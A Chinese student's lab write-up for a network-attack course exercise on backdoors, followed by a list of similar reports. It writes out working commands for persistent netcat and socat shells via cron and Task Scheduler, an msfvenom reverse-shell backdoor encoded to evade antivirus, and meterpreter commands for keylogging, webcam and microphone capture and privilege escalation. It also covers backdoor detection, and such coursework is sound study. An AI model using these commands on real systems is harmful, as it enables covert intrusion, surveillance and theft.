正文

20155204王昊《网络对抗技术》exp2后门原理与实践(代码片段)

20155204王昊  20155204王昊  2022-10-30  743

关键词：

20155204 王昊《网络对抗技术》EXP2 后门原理与实践

一、实验内容

准备工作（试用ncat、socat）

1. 使用netcat获取主机操作Shell，cron启动。

明确目标：要利用crontab命令从Windows获得linux的shell。
在Windows下监听自定端口。
用man命令查询crontab命令用法
使用crontab -e指令编辑定时任务。（前面的数字是你想要让他在每个小时的某分钟运行）
等到自己设定的分钟数后，得到了linux的shell。

2. 使用socat获取主机操作Shell, 任务计划启动。

Windows下搜索任务计划工具，打开后创建任务（自定义名称），然后新建触发器。
程序和脚本选择socat.exe路径，添加参数要写tcp-listen:5204 exec:cmd.exe,pty,stderr，用来将cmd.exe绑定到端口5204，同时把cmd.exe的stderr重定向到stdout上。
创建完成后，再次进入系统（可以通过锁定计算机来完成），发现任务已经在运行。
在linux环境下输入指令socat - tcp:172.30.4.71:5204，这里的第一个参数-代表标准的输入输出，第二个流连接到Windows主机的5204端口

3.使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

选用难一点的指令

msfvenom -p windows/meterpreter/reverse_tcp -x ./20155204.exe -e x86/shikata_ga_nai -i 5 -b ‘\\x00’ LHOST=1 LPORT=5204 -f exe > 20155204_backdoor.exe

参数说明：

	-p 使用的payload。payload翻译为有效载荷，就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode.
	-x 使用的可执行文件模板，payload(shellcode)就写入到这个可执行文件中。
	-e 使用的编码器，用于对shellcode变形，为了免杀。
	-i 编码器的迭代次数。如上即使用该编码器编码5次。
	-b badchar是payload中需要去除的字符。
	LHOST 是反弹回连的IP
	LPORT 是回连的端口
	-f 生成文件的类型
	> 输出到哪个文件

生成后门程序后，可以通过nc传到Windows下，利用vmware的增强功能可以直接把文件拖过去（此过程杀毒软件会报警，关掉它或者忽略）
在Kali上使用msfconsole指令进入msf控制台，使用监听模块，设置payload，设置反弹回连的IP和端口。
这里一定注意理解反弹端口的意义，以及LHOST的意义，不要像我一样，把LHOST一直设成了被攻击主机的IP。。。（下面这个是错误图片）
设置好后可以开始监听，用exploit
在Windows里双击运行后门程序
linux便获得了远程控制的shell

4. 使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

使用record_mic指令可以截获一段音频。
使用webcam_snap指令可以使用摄像头进行拍照。
使用webcam_stream指令可以使用摄像头进行录像。
使用screenshot指令可以进行截屏。
使用keyscan_start指令开始记录下击键的过程，使用keyscan_dump指令读取击键的记录。
先使用getuid指令查看当前用户，使用getsystem指令进行提权。（这里提一下，我周围用win7虚拟机的同学好像都会出错，但是我用的是PC本身的系统，直接就好了。同学的问题我也不会解决。。）

二、基础问题回答

例举你能想到的一个后门进入到你系统中的可能方式？

答：在Unix里,login程序通常用来对telnet来的用户进行口令验证. 入侵者获取login.c的原代码并修改,使它在比较输入口令与存储口令时先检查后门口令. 如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入. 这将允许入侵者进入任何帐号,甚至是root.由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问的, 所以入侵者可以登录获取shell却不会暴露该帐号。

例举你知道的后门如何启动起来(win及linux)的方式？

答：1．操作系统自带服务； 2．网络协议捆绑； 3．软件编写者制作； 4．漏洞攻击后放置； 5．社会工程学等相关方式。

Meterpreter有哪些给你映像深刻的功能？

答：录屏、录按键、提升权限都很强，这种功能一旦落入坏人手里就很危险了。。。

如何发现自己有系统有没有被安装后门？

答：

检测网络连接，可以使用Windows自带的网络命令来看看谁在连接你的计算机。具体的命令格式是:netstat -an 这个命令能看到所有和本地计算机建立连接的IP，它包含四个部分——proto(连接方式)、local address(本地连接地址)、foreign address(和本地建立连接的地址)、state(当前端口状态)。通过这个命令的详细信息，我们就可以完全监控计算机上的连接，从而达到控制计算机的目的。
2.检查账户，先在命令行下输入net user，查看计算机上有些什么用户，然后再使用“net user+用户名”查看这个用户是属于什么权限的，一般除了Administrator是administrators组的，其他都不是!如果你发现一个系统内置的用户是属于administrators组的，那几乎肯定你被入侵了，而且别人在你的计算机上克隆了账户。

三、实验总结与体会

这次实验让我感受到了自己系统的安全性，在黑客面前就想他们口中的肉鸡一样，这让我更加认识到了信息安全的重要性。

2019-2020-2网络对抗技术20174326旦增列错exp2后门原理与实践(代码片段)

2019-2020-2网络对抗技术20174326旦增列错Exp2后门原理与实践目录一、实验介绍二、实验准备三、实验过程任务一：使用netcat实现windows,linux之间的后门连接任务二：使用socat获取主机操作Shell,任务计划启动任务三：MFSmeterpreter生... 查看详情

2017-2018-2《网络对抗技术》20155322第五周exp2后门原理与实践(代码片段)

#2017-2018-2《网络对抗技术》20155322第五周Exp2后门原理与实践[博客目录]1-实践目标1.1-实践介绍1.2-实践内容1.3-实践要求2-实践过程2.1-使用nc实现win，mac,Linux间的后门连接2.2-meterpreter的应用2.3-MSFPOST模块的应用2.4-注入Shellcode并执行3-... 查看详情

2019-2020-220175303柴轩达《网络对抗技术》exp2后门原理与实践(代码片段)

目录2019-2020-220175303柴轩达《网络对抗技术》Exp2后门原理与实践1.基础知识总结2.实验内容任务一任务二任务三任务四任务五3.问题与解决4.基础问题回答5.实验总结与体会2019-2020-220175303柴轩达《网络对抗技术》Exp2后门原理与实践1... 查看详情

网络对抗技术2017-2018-220152515exp2后门原理与实践(代码片段)

1.实验内容(1)使用netcat获取主机操作Shell，cron启动(0.5分)(2)使用socat获取主机操作Shell,任务计划启动(0.5分)(3)使用MSFmeterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell(0.5分)(4)使用MSFmeterpreter（... 查看详情

2018-2019-2网络对抗技术20165236exp2后门原理与实践

2018-2019-2网络对抗技术20165236Exp2后门原理与实践一、实验内容（3.5分） (1)使用netcat获取主机操作Shell，cron启动 (0.5分) (2)使用socat获取主机操作Shell,任务计划启动(0.5分) (3)使用MSFmeterpreter（或其他软件）生成可... 查看详情

2019-2020-220175305张天钰《网络对抗技术》exp2后门原理与实践

2019-2020-220175305张天钰《网络对抗技术》Exp2后门原理与实践知识点概括后门：不经过正常认证流程而访问系统的通道。后门类型：编译器留后门操作系统留后门应用程序中留后门潜伏于操作系统中或伪装为特定应用的专用后门程... 查看详情

20155338《网络对抗》exp2后门原理与实践

20155338《网络对抗》Exp2后门原理与实践一、基础问题（1）例举你能想到的一个后门进入到你系统中的可能方式？答：游览网站中附带的广告或弹出的不正规软件。（2）例举你知道的后门如何启动起来(win及linux)的方式？答：1．... 查看详情

2018-2019-220165217《网络对抗技术》exp2后门原理与实践

2018-2019-220165217《网络对抗技术》Exp2后门原理与实践实验内容使用netcat获取主机操作Shell，cron启动使用socat获取主机操作Shell,任务计划启动使用MSFmeterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机... 查看详情

20145317彭垚《网络对抗》exp2后门原理与实践

20145317彭垚《网络对抗》Exp2后门原理与实践基础问题回答例举你能想到的一个后门进入到你系统中的可能方式？在网上下载软件的时候，后门很有可能被捆绑在下载的软件当中；例举你知道的后门如何启动起来(win及linux)的方式... 查看详情

2019-2020-2网络对抗技术20175311胡济栋exp2后门原理与实践(代码片段)

2019-2020-2网络对抗技术20175311胡济栋Exp2后门原理与实践一、实验介绍1.后门原理概念后门就是不通过正常认证流程而非法访问操作系统的通道，一般编译器、操作系统、应用程序中都可能留有后门。2.后门操作流程获取常用后门程... 查看详情

2018-2019-2网络对抗技术20165318exp2后门原理与实践(代码片段)

2018-2019-2网络对抗技术20165318Exp2后门原理与实践后门的基本概念及实验内容常用后门工具netcatWin获得LinuxShellLinux获得WinShellMeterpreter实验内容任务一：使用netcat获取主机操作Shell，cron启动任务二：使用socat获取主机操作Shell,任务计... 查看详情

20155218《网络对抗》exp2后门原理与实践(代码片段)

20155218《网络对抗》Exp2后门原理与实践常用后门工具实践1.Windows获得LinuxShell:在Windows下，先使用ipconfig指令查看本机IP,使用ncat.exe程序监听本机的5218端口,在Kali环境下，使用nc指令的-e选项反向连接Windows主机的5218端口,Windows下成功... 查看详情

20155227《网络对抗》exp2后门原理与实践(代码片段)

20155227《网络对抗》Exp2后门原理与实践基础问题回答(1)例举你能想到的一个后门进入到你系统中的可能方式？在非官方网站下载软件时，后门很可能被捆绑在软件中。攻击者利用欺骗的手段，通过发送电子邮件或者文件，并诱使... 查看详情

20145331魏澍琛《网络对抗》exp2后门原理与实践

20145331魏澍琛《网络对抗》Exp2后门原理与实践基础问题回答(1)例举你能想到的一个后门进入到你系统中的可能方式？上网时候弹出一个广告说你中奖了，或者你可以贷款10万元之类的，你一激动一点进去后门就进入你的系统了。(... 查看详情

20155202张旭《网络对抗》exp2后门原理与实践(代码片段)

20155202张旭《网络对抗》Exp2后门原理与实践基础问题回答例举你能想到的一个后门进入到你系统中的可能方式？捆绑在软件中注入在可执行文件里注入在office文件的宏里面例举你知道的后门如何启动起来(win及linux)的方式？更改... 查看详情

2019-2020-220175301李锦然《网络对抗技术》exp2后门原理与实践(代码片段)

2019-2020-220175301李锦然《网络对抗技术》Exp2后门原理与实践目录1.实践目标(1)使用netcat获取主机操作Shell，cron启动(0.5分)(2)使用socat获取主机操作Shell,任务计划启动(0.5分)(3)使用MSFmeterpreter（或其他软件）生成可执行文件，利用ncat... 查看详情

2019-2020-220174322童硕《网络对抗技术》exp2后门原理与实践(代码片段)

2019-2020-220174322童硕《网络对抗技术》Exp2后门原理与实践一、实验内容及预备知识1.实验内容2.基础问题回答二、常用后门工具实践　　任务一：Windows获得LinuxShell　　任务二：Linux获得WindowsShell　　任务三：使用nc传输数... 查看详情

2018-2019-220165235《网络对抗技术》exp2后门原理与实践(代码片段)

2018-2019-220165235《网络对抗技术》Exp2后门原理与实践实验内容1.使用netcat获取主机操作Shell，cron启动2.使用socat获取主机操作Shell,任务计划启动3.使用MSFmeterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取... 查看详情